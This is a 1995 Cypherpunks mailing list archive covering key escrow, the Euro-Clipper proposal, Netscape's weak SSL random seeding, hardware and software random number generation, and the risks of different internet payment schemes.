Jim Bidzos is a US Permanent Resident Alien and Greek citizen. He has a Green Card. It doesn't have any ITAR impact, since the ITAR term 'Foreign Person' doesn't include Green Carded Resident Aliens. It probably wouldn't have any impact anyway, since he's a business weenie, and not a software weenie. Now, if he had a _programmer_ that wasn't a US Citizen, that would be a-whole-nother kettle of fish.

He's previously stated that he would become a US Citizen, if it were not for the fact that Greece would require him to give up his Greek (and hence his EC) citizenship.

See Simson Garfinkel's book on PGP for more details.
From jim at rand.org Wed Sep 20 17:18:24 1995
From: jim at rand.org (Jim@rand.org)
Date: Wed, 20 Sep 95 17:18:24 PDT
Subject: Clipper: the definitive meme
Message-ID: <9509201550146386@ci.diamond-bar.ca.us>

Date: Mon, 11 Sep 95 08:26:42 PDT
From: Jim Gillogly

T-shirt!! T-shirt!!

Jim Gillogly
Trewesday, 20 Halimath S.R. 1995, 15:26

------- Forwarded Message

From: wtshaw at aol.com (WTShaw)
Newsgroups: talk.politics.crypto
Subject: Re: Impressions of the NIST meeting
Date: 11 Sep 1995 04:50:27 -0400

In the world of Jet-Age crypto, the government offers up a biplane, and seeks to reserve the second seat for themselves.

------- End of Forwarded Message

From carolann at censored.org Wed Sep 20 17:20:51 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 17:20:51 PDT
Subject: www.commentary.unabomber
Message-ID: <199509210020.RAA15682@usr5.primenet.com>

Go FrogFarm Go!

From: Damaged Justice
Subject: Re: www.commentary.unabomber
To: carolann at censored.org
Date: Wed, 20 Sep 1995 20:03:45 -0400 (EDT)
X-Angst-Level: Fair to Middlin'
X-Authentication-Vegetable: Aardvark
X-NSA-Food: narcotics anarchy bosnia encryption assassinate
X-Thrash-Confirmation: Ahh! Hippy on a stick!
Organization: Somewhere just far enough outside of your jurisdiction
Reply-To: frogfarm at yakko.cs.wmich.edu

Yes, it's a complete version. I've also started a rudimentary rebuttal/commentary page at http://yakko.cs.wmich.edu/~frogfarm/unabuttal.html

- --
frogfarm at yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual
s..O)....  The smurf wields a hypodermic!  -- More --   I like women who
@.../."..  You destroy the smurf!  -- More --           are *strong*, in
.$*...]..  You feel self-righteous!                     every sense of the word.

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org  206.42.112.96
My Homepage  The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
http://dcs.ex.ac.uk/~aba/export/

From anon-remailer at utopia.hacktic.nl Wed Sep 20 17:27:34 1995
From: anon-remailer at utopia.hacktic.nl (Anon-remailer@utopia.hacktic.nl)
Date: Wed, 20 Sep 95 17:27:34 PDT
Subject: NETSCAPE TO PATCH SHAREWARE VERSION
Message-ID: <9509201550426518@ci.diamond-bar.ca.us>

Date: Tue, 12 Sep 1995 23:00:18 +0200
To: cypherpunks at toad.com
Subject: Re: Netscape to patch shareware version
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Organization: Hack-Tic International, Inc.

>| Netscape said it received word last week that the State Department had cleared that version for release on the Net, but only within the U.S., owing to current export laws banning the export of encryption schemes stronger than 40 bits. The company could provide no details by press time on how it would ensure that the 128-bit version wouldn't leak beyond U.S. borders.
>
>Ok, any bet on how long it will take?

It's already been exported. Evidently, one of those who bought the commercial

I note the site removed it, however, probably because Netscape Comm. Inc.
reque

From dsc at swcp.com Wed Sep 20 17:27:35 1995
From: dsc at swcp.com (Dsc@swcp.com)
Date: Wed, 20 Sep 95 17:27:35 PDT
Subject: (NOISE) X-FILES ANARCHIST
Message-ID: <9509201552126919@ci.diamond-bar.ca.us>

Date: Sat, 16 Sep 1995 09:56:59 -0600
To: cypherpunks at toad.com
From: dsc at swcp.com (Dar Scott)
Subject: (Noise) X-Files anarchist

I hardly watch TV ...blah, blah..., but I saw X-files last night. A very minor character was a cryptohacker who--to his surprise--brute-forced a military key for some files. He was described as an anarchist. To _my_ surprise, this anarchist was not associated with violence or lunatic ravings. He was shown as reading a book entitled something like Survey of Modern Conspiracy Theories.

I see this as an improvement in the stereotype of computer-associated anarchists. And this I see as a good thing, since I think there is a lot that could be learned from anarchists.

I think the character was killed, but I may have missed something.

Dar

===========================================================
Dar Scott                  Home phone: +1 505 299 9497
Dar Scott Consulting       Voice:      +1 505 299 5790
8637 Horacio Place NE      Email:      darscott at aol.com
Albuquerque, NM 87111                  dsc at swcp.com
Fax: +1 505 898 6525       http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From terrell at sam.neosoft.com Wed Sep 20 17:27:56 1995
From: terrell at sam.neosoft.com (Terrell@sam.neosoft.com)
Date: Wed, 20 Sep 95 17:27:56 PDT
Subject: GAK
Message-ID: <9509201549166094@ci.diamond-bar.ca.us>

Date: Thu, 07 Sep 1995 18:42:06 -0500
To: cypherpunks at toad.com
From: terrell at sam.neosoft.com (Buford Terrell)
Subject: Re: GAK

>Date: Sun, 3 Sep 1995 21:25:26 -0400 (EDT)
>From: Brian Davis
>Subject: Re: GAK
>
>On Fri, 1 Sep 1995, Timothy C. May wrote:
>
>> At 10:56 PM 9/1/95, Buford Terrell wrote:
>>
>> >If you've ever watched Not_at_all_Funny Home Videos or any of the American Urinal school of tabloid television, you soon start feeling that the real threat to privacy is not the guvmint, but all of the yoyos with their little cam corders running around pointing them at people.
>> >
>> >Security cameras in ATMS and at airline ticket counters do more to threaten your privacy than do FIBBIE wiretaps, and PGP won't protect you from them. (and usually neither will the courts).
>>
>> I absolutely agree with this, though this doesn't mean I'll stop worrying about the government's plans for key escrow (GAK), about limits on key lengths, or about other efforts to thwart strong security.
>
>I, of course, know of the "dislike" of GAK here. I am curious to know, however, if the "dislike" is because government would have access under any circumstances or if the primary worry is that government will cheat and get access when most would agree that they shouldn't (either by the judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of non-LEA members of this list, would the escrow be acceptable??
>
>EBD
>

In my case, it's simply a matter of principle: the government has no right to know what I'm saying. Search warrants may allow them to get to "things" that I have, but the First and Fifth amendments make words sacred. If the government can eavesdrop on my conversation, then my speech is no longer free.

A review board consisting of cypherpunks has no more right to listen to my private conversations than does the FBI, so I would not agree to that proposal either.

--buford

From pfarrell at netcom.com Wed Sep 20 17:28:40 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Wed, 20 Sep 95 17:28:40 PDT
Subject: Selling our spin.
was: Cypherpunks Press release
Message-ID: <73484.pfarrell@netcom.com>

Kevin L Prigge writes:
> Does anyone know exactly how the press contact thing works? My impression is that a reporter/journalist stumbles on to someone who knows something about a particular area, and is willing to be interviewed. Then the next time a story comes along that deals even slightly with that subject, the reporter will tend to contact that person.

I think the "exact" process varies with the journalist. But you have it generally correct. The press runs on reputations. When a writer gets a story, they look for "reliable sources" to contact. Reputations are based on a lot of things, including knowledge, speaking ability, looks and the ability to emit a sound-bite that is interesting. It is a strange process. I mean, I even got on CNN during the Morris worm.

Tim is right, there is no "we" here. We can't have an official spokesperson, we don't agree on much. But we can work from the ground up. There are a number of serious cryptographers on the list, or at least friendly to the list when the S/N ratio makes sense. With a little work, we should be able to find a fairly long list of media contacts. We can even make it media friendly.

From people I've personally seen recently, we could have
Doug Humphrey of Digex (nice to have a security-related company President)
Bob Stratton of UU.Net (corporate security wiz)
Carl Ellison of TIS (usually on c'punks light and at all DCcp meetings)
probably others at TIS such as Ken Mendelsen or Steve Walker

For the political side, the folks at EFF, CDT, EPIC, etc.

And there are others that could be good contacts, such as William H Murray of Deloitte and Touche, Matt Blaze of [Bellcore|BellLabs]

It might take a while to get permission for referral, but I expect that most security consultants would consider being quoted in mainstream press to be good advertising. If we make it easy, anyone would be willing to take advantage of the resource.
We should also include a representative sample of folks who disagree with us. Any real list should include Dorothy Denning and other supporters. We can simply stack the deck.

We can make sure that the mainline journalists know where to look, and make sure that CDT, EFF, ACLU, and EPIC have references that are ready when they are asked for referrals.

Assuming my web server recovers from the mention in comp.risks, I'm more than willing to accept suggestions and have a "security spokes-folks" page.

Pat

Pat Farrell    Grad Student    http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage    #include

From jsw at netscape.com Wed Sep 20 17:49:02 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 17:49:02 PDT
Subject: netscape's response
In-Reply-To: <199509210016.RAA20367@guaymas.CS.Berkeley.EDU>
Message-ID: <9509201745.ZM206@tofuhut>

On Sep 20, 5:16pm, David_A Wagner wrote:
> Subject: Re: netscape's response
> In article <9509200139.ZM206 at tofuhut> you write:
> > On Sep 20, 12:29am, Christian Wettergren wrote:
> > > One wild idea that I just got was to have servers and clients exchange random numbers (not seeds of course), in a kind of chaining way. Since most viewers connect to a number of servers, and all servers are connected to by many clients, they would mix "randomness sources" with each other, making it impossible to observe the local environment only. And the random values would of course be encrypted under the session key, making it impossible to "watch the wire".
> >
> > Wow, this is a great idea!!
>
> Are you quite sure this is a good idea?
>
> I'd be very scared of it. In particular, it opens up the chance for adversaries to feed you specially chosen numbers to pollute your seeds.

What I should have said is that it's a very interesting idea.
Given current perceptions of netscape, I should have made clear that I wouldn't do something like this without getting a lot more discussion and review of possible dangers and how to avoid them. I certainly can't fault anyone for wondering if we would just implement this without thinking it through, given recent events.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From tcmay at got.net Wed Sep 20 17:54:47 1995
From: tcmay at got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 17:54:47 PDT
Subject: AN OPPORTUNITY NOT TO BE MISSED
Message-ID: <9509201551146661@ci.diamond-bar.ca.us>

Date: Wed, 13 Sep 1995 19:25:24 -0700
To: cypherpunks at toad.com
From: tcmay at got.net (Timothy C. May)
Subject: Re: An opportunity not to be missed

At 1:57 AM 9/14/95, Bill Stewart wrote:
>Is Wavy Gravy running his "Nobody for President" campaign again this time? After all, Nobody's going to balance the budget, and Nobody's going to get the government out of your bedroom, and on the internet, Nobody can tell if you're a dog or not :-)

Or to update it for today: "Nobody at remailer.org for President."

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From gnu at toad.com Wed Sep 20 20:23:19 1995
From: gnu at toad.com (John Gilmore)
Date: Wed, 20 Sep 95 20:23:19 PDT
Subject: Spam of c'punks list: cleaning it up now.
Message-ID: <9509210323.AA03882@toad.com> Somebody, apparently at ci.diamond-bar.ca.us, has been feeding the last month's worth of Cypherpunks postings back to the Cypherpunks list. You probably saw a few of them. They are still coming in to toad.com. When I got home this afternoon, the load average had hit 150 and most of them were copies of sendmail. This prevented most of the messages from getting out to you, happily. I've cleaned up the ones I found in the queues, and I'll start working next on getting the *valid* cypherpunks messages flowing again... John Gilmore From eay at mincom.oz.au Wed Sep 20 20:38:49 1995 From: eay at mincom.oz.au (Eric Young) Date: Wed, 20 Sep 95 20:38:49 PDT Subject: Random Number State In-Reply-To: <9509202150.AA08164@toad.com> Message-ID: Some ramblings on the RNG seeding issue, comments welcome. I'm sort of in the position of Netscape in that I have an SSL library that needs good random numbers for both RSA key generation (soon DH) and SSL sessions. While most of the discussions have been how to generate random data, one solution I will probably follow is that when any 'semi-random' data is generated, make sure to save this for seed data the next time the application starts. I have faith in the RNG capabilities of my RNG (based on MD5) and my RAND_seed() routine only 'adds' to the RNG state (about 1k's worth is kept). I can continue to 'mix' the RNG state at any point in time. My RND_seed() xors into the existing state, it does not overwrite. Because my SSL/encryption library contains 'everything', I have the ability to put calls to my RNG_seed() routine in places like when I decrypt a private key. I can pass both the password (if the key was encrypted) and the private key into the RNG state (making sure any data that goes into the RNG state can not be determined if a 'core' file is generated). I will probably also put the time() into the RNG state whenever an SSL_connect or SSL_accept is made (I think I do already). 
I may also put in select data that has been read from the remote host. While most of this data can be determined by watching network activity, if it is just a delta to the initial random state it is somewhat more useful. The first time user 'x' runs the application they are made to 'generate' some reasonable random data. For all subsequent executions of the program, any more semi (pseudo?) random data generated can be mixed in with the initial random data. The profile of the usage of the application would end up determining the random data to use. I feel it is a bit much to try to generate good random data every time an application is run. I believe this is the type of approach PGP uses (I have not looked at the code). eric PS I also do some 'evil' things in that I load 'garbage' bytes from the stack into my RNG state whenever the RNG is called. It may not be random, but I bet it is hard to determine from the outside the running program :-) It can only help :-). -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From tcmay at got.net Wed Sep 20 20:45:17 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 20 Sep 95 20:45:17 PDT Subject: Project: a standard cell random number generator Message-ID: At 9:50 PM 9/20/95, John Gilmore wrote: >Software-generated random numbers are likely to be of poor quality. >There just isn't that much true randomness visible to computers. >Several ways to build good hardware random number generators are >known. But before hardware random number generators can be >incorporated into common desktop computers, someone will have to put >them into a small fraction of a chip. Essentially, to have good market penetration, this means building a small hardware random number generator into the Pentium, and a few other popular processors. Building it into a separate chip is ineffective, as chip counts are going down on motherboards. 
(Some may quibble, but clearly about 60-80% of the market is now x86-based, with motherboards supplied by a limited number of companies, and with "chipsets" like the Triton.) What would it take to convince Intel, then, to devote resources to put a HRNG module on, say, future versions of the Pentium, Pentium Pro (P6), etc.? A lot, I'd say. First, Intel will ask what products would gain from _some_ hardware platforms having HRNG when the majority will not. (This is important, because it means that as long as there are vast numbers of 486-, Pentium-, SPARC-, MIPS-, 68K-, and PPC-based systems out there that DON'T have hardware random number generators, then Netscape and other suppliers of software CANNOT COUNT ON THE HRNG. This is an important point: a hardware RNG standard will take many years to percolate into the installed base and reach a level of penetration where even 30% of all machines are equipped with HRNG modules. In the meantime, Netscape and everyone else has to come up with solutions which fit the existing and nearterm-available machines. Second, how much extra will customers pay? Even if the area of the HRNG is less than 1% of the total, design resources are consumed and potential reliability and liability issues arise. (Liability is problematic precisely because the HRNG is nondeterministic, and some chips are likely to be "more random" (which is "good") than others which are "less random" (which is "bad"). Imagine a customer having a chip which he finds out produces very little entropy, for technical/manufacturing reasons. >You probably can't build a hardware random number generator out of >existing "gate array" gates or "standard cell" cells, because all the >existing gates and cells are designed to behave completely >predictably! It will take designing a new circuit structure. You probably can, actually. CMOS and BiCMOS have all sorts of structures in which threshold voltages can be measured. 
DRAM arrays have various seemingly-random (*) discharge characteristics. Zener diodes can be built in any of these technologies. At small enough structural levels, such as we are now seeing at the .35 micron level and below, noise is omnipresent, and is dealt with in various ways. Thus, using the noise is not so difficult. (* The various charge/discharge characteristics are actually not random, of course, and are reproducible. But with care they can be used to increase the entropy of other sources. Care must be taken.) >Do we know any solid state physics / circuit design experts who think >this might be a fun thing to do? I bet you could get a paper out of >it. And probably improve the world a few years later, when companies >used your paper to close another hole in their computer security. I'm skeptical for the reasons given above. Even starting today, far too long to get enough out there. (Far-future thinkers will say, "Then let's start now," but it still is not true that companies like Netscape or Verisign will use such an invention to close another hole...they could only close the hole for the customers who had the HRNG-equipped machines, and this is not likely to be enough for quite some time. As John knows, but others may not, I worked on random noise effects in devices at Intel. A co-worker (now President of IC Works, Ilbok Lee) and I developed a hardware random number generator based on very low level radiation sources, using an effect I discovered. We tried to get a patent on it, in 1978, but there was no interest by Intel. Personally, I think that "software + user actions + environment stuff" can generate vast amounts of usable entropy, especially if a user lets it accumulate immediately prior to generating crypto material. * Software -- the standard cryptographic hash functions to "mix" bits even further. * User Actions -- mouse movements, keyboard timing, microphone noise, etc. 
* Environmental Stuff -- measurement of disk access timings, in milliseconds, amount of free blocks, Ethernet packet stuff, etc. (This may or may not be good for more than a few bits per second, but can be accumulated for several minutes or hours.) Any of these has various weaknesses and points of attack. But let's face it, would Goldberg and Wagner have been able to crack Netscape if the PRNG had used some mouse swirling, some random keyboard pounding, some disk access measurements, and had then hashed this with a noninvertible hash function? I think not. This approach has the benefit of working almost immediately, without special dongles on the back of machines or of convincing Intel and Motorola to add special functions (which would take years to effectively penetrate the market). --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cwe at Csli.Stanford.EDU Wed Sep 20 20:45:57 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Wed, 20 Sep 95 20:45:57 PDT Subject: netscape's response In-Reply-To: <199509202215.PAA14101@ix.ix.netcom.com> Message-ID: <199509210153.SAA25449@Csli.Stanford.EDU> Christian (that's me) writes: | I think it is important to bring together factors of the user _and_ | the environment, preferably an environment that reaches as far from | the local site as possible. This makes "jamming" of the random seed | selection process harder. | | The other problem in gathering random bits for a seed is that most | bits are visible by someone else close enough within your environment. 
| Interarrival times of packets are fine, but anyone can observe them | with quite a good accuracy. How do you escape the "local environment | problem"? | | . - . | | One wild idea that I just got was to have servers and clients exchange | random numbers (not seeds of course), in a kind of chaining way. Since | most viewers connect to a number of servers, and all servers are | connected to by many clients, they would mix "randomness sources" with | each other, making it impossible to observe the local environment | only. And the random values would of course be encrypted under the | session key, making it impossible to "watch the wire". | | Problems: | * watch out for "multiply by zero" attacks by a rogue server/client. | * watch out for "almost singular values" in the same way. | * only let one source contribute a certain amount of randomness, like | (key length)/(aver # of peers). | * never reveal your current seed, only a non-trivially derived random | value from it. (of course) | * make sure your initial seed is good enough, or the whole thing is | broken. | * perhaps save part of the previous session state into a protected | file, to be able to keep up the quality of the initial seed. | | I think I like it, perhaps not from a practical point of view as much | as the 'non-attackability' of it. It's quite cypher-a. Bill Stewart answered: | | Be _very_ careful with this approach - it's the kind of thing that a | rogue server or client might abuse to find out randomness or other state | information about the clients or servers connecting to it. Of course you have to be very careful, as you say. Did you see my problem-section in the original letter? I included it above. Since then I have realized that the | * only let one source contribute a certain amount of randomness, like | (key length)/(aver # of peers). really should be | * only let one source contribute a certain amount of randomness, like | (large entropy buffer)/(aver # of peers). 
and that you should only give out approximately the same amount of randomness to the neighbour, as you point out below. | At minimum, only give out some of your randomness, XORed with some | arbitrary value to scramble the range and then hashed before sending, | so that the recipient can't find out the values you're using. My approach solves part of the problem of "the observable local environment" problem. Jeff's reply to this suggestion might be somewhat dangerous, if the exchanged 'randomness bits' are the challenge/responses in the exchange. (Based on his remark of not needing to change protocol.) You would arguably not want to have the loop RNG --> "unguessable chall/resp" ---+ /\ | +---------------------------------+ I would say that the only acceptable solution would be to have (viewer)consumer <-------------------->consumer (srv) /\ /\ | | ---> RNG1 <----------------------> RNG2 <----- RNGn /\ /\ | | RNGx RNGy separating the "building up" of randomness from the consuming phase of that built up randomness, the actual part which has to be totally unpredictable. /Christian From shields at tembel.org Wed Sep 20 20:46:12 1995 From: shields at tembel.org (Michael Shields) Date: Wed, 20 Sep 95 20:46:12 PDT Subject: MIME In-Reply-To: <199509201253.IAA21521@tequesta.gate.net> Message-ID: > >I think that it must be the content-type that is causing problems, > > Yes, I agree. Make it something like ASCII text But it's not text/plain. It's PGP'ed text/plain. The only way to indicate this in MIME is with a content-type. (Yes, they're working on a general way to encapsulate encryption.) Fine, I'll just leave mail to the list unsigned. -- Shields. From herbs at interlog.com Wed Sep 20 20:46:26 1995 From: herbs at interlog.com (Herb Sutter) Date: Wed, 20 Sep 95 20:46:26 PDT Subject: Please send me SSL problems... 
Message-ID: <199509210134.VAA09069@gold.interlog.com> At 18:18 1995.09.20 -0400, Ian Goldberg wrote: >In article <199509201004.DAA23933 at ammodump.mcom.com>, >Jeff Weinstein wrote: >> >> I'd just like to let all cypherpunks know that I'm really interested in >>getting any feedback you might have about security problems with Netscape >>products. I'm particularly interested in bugs in the our implementation >>of SSL, and problems in the protocol that are not addressed in SSL 3.0. > >Well, if you'd release Netscape source, we could check its >implementation... :-) > > - Ian Mmm... sounds like they want some free consulting. :-) (BTW, Ian, you're at UofW? I thought your original 'discovery' email of three days ago had a berkeley.edu address on it... anyway, if you are a UofW'er, hello from a fellow Waterloo math/cs grad!) Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From jsw at netscape.com Wed Sep 20 20:46:40 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 20:46:40 PDT Subject: netscape's response Message-ID: <9509201835.ZM154@tofuhut> NOTE: my first attempt to send this bounced at toad.com On Sep 20, 5:16pm, David_A Wagner wrote: > Subject: Re: netscape's response > In article <9509200139.ZM206 at tofuhut> you write: > > On Sep 20, 12:29am, Christian Wettergren wrote: > > > One wild idea that I just got was to have servers and clients exchange > > > random numbers (not seeds of course), in a kind of chaining way. Since > > > most viewers connect to a number of servers, and all servers are > > > connected to by many clients, they would mix "randomness sources" with > > > each other, making it impossible to observe the local environment > > > only. And the random values would of course be encrypted under the > > > session key, making it impossible to "watch the wire". 
> > > > Wow, this is a great idea!! > > Are you quite sure this is a good idea? > > I'd be very scared of it. In particular, it opens up the chance for > adversaries to feed you specially chosen numbers to pollute your seeds. What I should have said is that its a very interesting idea. Given current perceptions of netscape, I should have made clear that I wouldn't do something like this without getting a lot more discussion and review of possible dangers and how to avoid them. I certainly can't fault anyone for wondering if we would just implement this without thinking it through, given recent events. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From nsb at nsb.fv.com Wed Sep 20 20:46:59 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Wed, 20 Sep 95 20:46:59 PDT Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping) In-Reply-To: Message-ID: <0kMA2EqMc50eMEb4Yx@nsb.fv.com> Laurent -- I strongly recommend that you make an effort to understand the real risks involved in Internet commerce. There are critical security flaws in the encrypted commerce approach, which I fear you are overlooking. By focusing on the ease of stealing a single identifier, or faking a single transaction, I think you overlook some much more important issues. The point is not that people can't intercept your First Virtual ID by sniffing on the net. Obviously they can. The point is not that people can't forge mail from you. Obviously they can. The point is not that people can't intercept FV's confirmation query, which contains a one-time code, and forge the appropriate response to authorize that purchase. Obviously they can. The point is not that people can't selectively block your incoming mail, so that you can't even tell when the above has happened. Obviously they can. 
The point is that if someone goes to all the trouble of doing all the above -- which is what it takes to commit serious fraud with First Virtual -- then *all* that they get is the temporary use, on the Internet only, of a single credit card. (Note also that I've just spelled out *exactly* what it takes to commit fraud with FV. I am suspicious of any commerce systems that don't offer such an explanation. In the case of SSL, the explanation would probably start out, "find a single bug in the implementation of the cryptographic algorithms.") Schemes like SSL, which encrypt a credit card number and then transmit it on the net, carry with them a very different kind of risk: the risk that a single criminal could steal MILLIONS of credit card numbers. If an SSL-like scheme were in wide use world-wide, the hacker who just made a name for himself by breaking SSL could instead have gone down in HISTORY as the person who destroyed the twentieth-century credit card system by stealing millions of credit cards and using each one just once. Or, if his goals were more practical, he could have simply chosen any desired level of affluence and lived that way for the rest of his life. (This is not an exaggeration. I can flesh this out to an alarming degree of detail, actually.) FV does not claim to have invented a method of commerce that is foolproof. There is no such system, and that certainly includes the existing credit card, cash, and check infrastructure. What FV has invented is a system for Internet commerce in which the risk/reward ratio is sufficiently low to permit large-scale commerce. Any cryptographic approaches which make similar claims must also be evaluated in terms of risk/reward ratio. If a system has a catastrophic risk, no matter how low-probability, this is worse than a system with higher-probability risks of much lower consequence. (When driving my car, I'd rather be in ten fender-benders than one high-speed head-on collision at 90 MPH.) 
My own experience with real-world software -- which is only confirmed by the recent SSL scandal -- makes me tend to believe that every program has bugs, and that therefore every crypto system will carry with it a significant practical risk of compromise. It therefore makes no sense to design the commerce infrastructure in such a way that the cost of that risk is catastrophic. FV has had several minor incidents of fraud. They didn't make any headlines and they didn't require any mad scramble to fix the software, because the costs of the fraud were so low to all concerned. -- Nathaniel -------- Nathaniel S. Borenstein | When privacy is outlawed, Chief Scientist, First Virtual Holdings | only outlaws will have privacy! FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMANN DEFENSE FUND! ---VIRTUAL YELLOW RIBBON-->> zldf at clark.net From iang at cory.EECS.Berkeley.EDU Wed Sep 20 20:47:15 1995 From: iang at cory.EECS.Berkeley.EDU (Ian Goldberg) Date: Wed, 20 Sep 95 20:47:15 PDT Subject: Euro-Clipper Message-ID: <199509210102.SAA15389@cory.EECS.Berkeley.EDU> I don't think I've seen this here (but it was on a bunch of security newsgroups...) - Ian Forwarded message: > > According to an article in `Communications Week International', the > 34-nation Council of Europe has agreed to outlaw strong encryption > products which do not make keys available to governments. > > The article, `Euro-Clipper chip scheme proposed', is on the front page > of the magazine's issue 151, dated 18th September, which arrived in my > mail this morning. > > It relates that the policy was approved on the 8th September at > Strasbourg by the Council, and coincides with an attempt by the > European Commission to propose a pan-European encryption standard. The > Council - unlike the Commission - has no statutory powers to enforce > its recommendations. 
However, Peter Csonka, the chairman of the > committee that drafted the document (and an administrative officer at > the Council's division of crime problems) says that `it is rare for > countries to reject Council of Europe recommendations'. > > The proposal would make telecomms operators responsible for decrypting > traffic and supplying it to governments when asked. It would also > `change national laws to enable judicial authorities to chase hackers > across borders'. > > Opposition to this measure was expressed by Mike Strezbek, VP > responsible for European telecomms at JP Morgan, who said that his > organisation `will challenge any attempt to limit the power of our > network encryption technologies very strongly'. > > Czonka said that the Council had given consideration to business > interests but had tried to strike a balance between privacy and > justice. However, `it remains possible that cryptography is available > to the public which cannot be deciphered,' his document says. `This > might lead to the conclusion to put restrictions on the possession, > distribution, or use of cryptography.' > > Apparently another international organisation, the OECD, has called a > conference of its members in December to devise a strategy on > encryption. > > I for one will be making clear to my MP that his stand on this issue > will determine how I cast my ballot at the next election. I note that > John Major stated in a 1994 parliamentary written reply to David Shaw > MP that the government did not intend to legislate on data encryption. > I am disappointed that government policy has changed to the point of > supporting the Council of Europe, and that this change has sneaked > through during the parliamentary recess. > > Ross Anderson > > > > From perry at piermont.com Wed Sep 20 20:47:30 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Wed, 20 Sep 95 20:47:30 PDT Subject: USA Today on Fear of Credit Cards over Net In-Reply-To: Message-ID: <199509202335.TAA05761@frankenstein.piermont.com> Re: The risk of credit cards. I suppose that indeed there are large risks elsewhere in the credit card system. However, I think that the credit card system itself is stupid and insecure and ought to be scrapped -- sending around account numbers as magic keys to get payment is a stupid move. It's not surprising how large credit card fraud is. One of the great hopes I have for cryptographic technology is its ability to lower the incidence of fraud, and thus lower transaction costs a lot. Someday, hopefully, everyone will be able to be a credit card merchant because you won't have to trust the merchants not to steal. Perry From dvw at hamachi.epr.com Wed Sep 20 20:47:52 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Wed, 20 Sep 95 20:47:52 PDT Subject: Encryption algorithms used in PrivaSoft (fwd) Message-ID: <3060D3B3@hamachi> David Clavadetscher of PrivaSoft writes: > At this time our crypto engine is patented and proprietary. Ian Goldberg writes: > Waitasec... I was under the impression that if you patented it, you had to > reveal it. That's why RC4 isn't patented (it used to be a trade secret). Many technologies have both patented parts and trade secret parts. Often, companies will maintain information that is in patent applications as trade secret until they are granted. I guess I should say _if_ they are granted! After a patent is granted, it is usually a good idea to also maintain some trade secrets in your products -- since trade secrets never "expire," unlike patents. If the patent isn't granted, you still have the option of treating the contents as an intellectual property under trade secret protection. 
dvw From dl at hplyot.obspm.fr Wed Sep 20 20:48:09 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 20:48:09 PDT Subject: netscape bug In-Reply-To: <199509201855.LAA17261@netcom16.netcom.com> Message-ID: <9509210259.AA09589@hplyot.obspm.fr> Vladimir Z. Nuri writes: [... some good points and other less good (imo) deleted ...] [.... netscape is good for us stuff ....] > Netscape is a world class product, and it's *free*. on this cypherpunks > list, I have seen no end to the venemous criticisms that people level at > *free* products, which IMHO is quite tasteless at times. FYI Netscape IS NOT FREE, at all. re-read the Licence that you shall read before clicking . (though it is not a problem in itself (alas, ppl must work for a living and sell stuff), apart from the insecurity through obscurity which is often a result of commercial products) [.... netscape is good for us stuff ....] > it reminds me of how much people here rant at Microsoft when > virtually no other company on the planet could pull off what they make > look easy (ah, that's another story I've filled up other posts with). Duh ... I wouldn't have insulted Netscape by quoting Micro$oft in the same post ;-) (half joking) [.... netscape is good for us stuff ....] dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept Qaddafi hack fissionable munitions terrorist Saddam Hussein Clinton From dl at hplyot.obspm.fr Wed Sep 20 20:48:42 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 20:48:42 PDT Subject: first virtual "security" (!!) 
